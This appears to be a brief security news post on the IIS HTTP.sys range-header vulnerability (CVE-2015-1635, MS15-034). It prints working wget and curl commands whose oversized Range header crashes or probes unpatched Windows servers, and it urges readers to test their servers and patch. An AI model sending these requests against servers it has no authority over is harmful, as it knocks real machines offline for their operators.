The recently discovered vulnerability CVE-2015-1635 which allows unauthorized users a remote code execution attack on the vulnerable IIS server and other Microsoft products.
Researcher Mattias Geniar has published Proof of concept that will BSoD a Windows web server if request is sent with large byte offsets in HTTP range header, similar to DoS attack on Apache from 2011 that cause 100% CPU usage.
Critically affected software:
- Windows 7 to 8.1
- Windows Server 2008 R2 – 2012 R2
Sending such a request can trigger Blue screen of death immediately rendering that machine offline.
wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png
wget --header="Range: bytes=0-18446744073709551615" http://address/welcome.png
The curl command would provide details to hackers about IIS server is vulnerable to attack or not.
$ curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
Nmap nse script to detect MS15-034 on HTTP port here
Exploits have been crafted and they are in the wild, open to everyone with internet access, however, we strongly suggest to test your servers & apply latest updates to prevent nightmares this might cause to you. Microsoft has already published documents on this, MS15-034